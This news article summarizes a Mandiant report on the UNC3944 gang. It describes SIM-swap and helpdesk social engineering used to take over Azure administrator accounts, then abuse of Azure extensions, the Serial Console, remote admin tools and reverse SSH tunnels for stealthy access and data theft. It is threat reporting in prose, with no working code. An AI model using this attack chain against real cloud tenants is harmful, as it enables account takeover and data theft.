Mandiant’s financially motivated cybergang by the name of “UNC3944” uses phishing and SIM swapping attacks to hijack Microsoft Azure administrator accounts and gain access to virtual machines.
From there, attackers abuse Azure Serial Console to install remote management software to persist and abuse Azure extensions for stealth monitoring.
Mandiant reports that UNC3944 has been active since at least May 2022, and their campaign aims to steal data from victim organizations using Microsoft’s cloud computing service.
UNC3944 was previously credited with creating the STONESTOP (loader) and POORTRY (kernel-mode driver) toolkit for security software termination.
Threat actors used stolen Microsoft hardware developer accounts to sign their kernel drivers.
SIM Switch for Azure Administrators
The initial access to the Azure administrator account is done using stolen credentials gained in SMS phishing, a common technique in UNC3944.
The attackers then impersonate the administrator when contacting the helpdesk agents to trick them into sending a multi-factor reset code via SMS to the target’s phone number.
However, the attacker had already swapped the administrator’s SIM number and transferred it to their device, so they would have received the 2FA code without the victim realizing the hack.
Mandiant has not yet determined how the hackers perform the SIM swapping phase of their operations. However, previous cases have shown that knowing a target’s phone number and colluding with unscrupulous communications personnel is sufficient to facilitate illegal number ports.
Once attackers establish a foothold in the target organization’s Azure environment, they use their administrator privileges to collect information, modify existing Azure accounts as needed, or create new ones.
Live off the land tactics
In the next attack phase, UNC3944 uses Azure extensions to perform monitoring and intelligence gathering, disguising their malicious processes as seemingly harmless daily tasks, and blending them with regular activity.
Azure Extensions are “extra” features and services that can be integrated into the Azure Virtual Machine (VM) to help extend capabilities, automate tasks, and so on.
Since these extensions are implemented inside the virtual machine and are usually used for legitimate purposes, they are stealthy and less suspicious.
In this case, the threat actor misused Azure’s built-in diagnostic extensions such as “CollectGuestLogs”, which were leveraged to collect log files from the compromised endpoint. Additionally, Mandiant found evidence of the actor attempting to abuse the following additional extensions:
Hacking virtual machines to steal data
Then, UNC3944 uses Azure Serial Console to get administrative console access to the virtual machines and to run commands at the command prompt via the serial port.
“This attack method was unique in that it avoided many of the traditional detection methods used in Azure and gave the attacker full administrative access to the virtual machine,” the Mandiant report explains.
Mandiant noted that “whoami” is the first command hackers execute to determine which user is currently logged on and gather enough information to advance the exploit.
More information on how to analyze Azure Serial Console logs can be found in the Reports Supplement.
Then, the threat actors use PowerShell to improve their stability on the virtual machine and install several commercially available remote administrator tools that are not mentioned in the report.
“To maintain a presence on a virtual machine, an attacker often deploys several commercially available remote administration tools via PowerShell,” the Mandiant report reads.
“The advantage of using these tools is that they are legitimately signed applications and provide the attacker with remote access without triggering alerts on many endpoint discovery platforms.”
The next step for UNC3944 is to create a reverse SSH tunnel for their C2 server, to maintain stealthy, persistent access over a secure channel, bypassing network restrictions and security controls.
The attacker configures the reverse tunnel with port forwarding, which facilitates a direct connection to the Azure VM via the remote desktop. For example, any incoming connection to a remote machine’s port 12345 will be forwarded to localhost port 3389 (the Remote Desktop Protocol service port).
Finally, the attackers use the credentials of the compromised user account to log into the compromised Azure VM via the reverse shell and only then proceed to expand their control within the compromised environment, stealing data along the way.
The attack presented by Mandiant demonstrates UNC3944’s deep understanding of the Azure environment and how they can take advantage of the built-in tools to avoid detection.
When this know-how is combined with high-level social engineering skills that help attackers perform SIM swaps, the stakes are magnified.
At the same time, a lack of understanding of cloud technologies from organizations deploying insufficient security measures, such as SMS-based multi-factor authentication, creates opportunities for sophisticated threat actors.
#Hackers #Azure #Serial #Console #gain #stealth #access #virtual #machines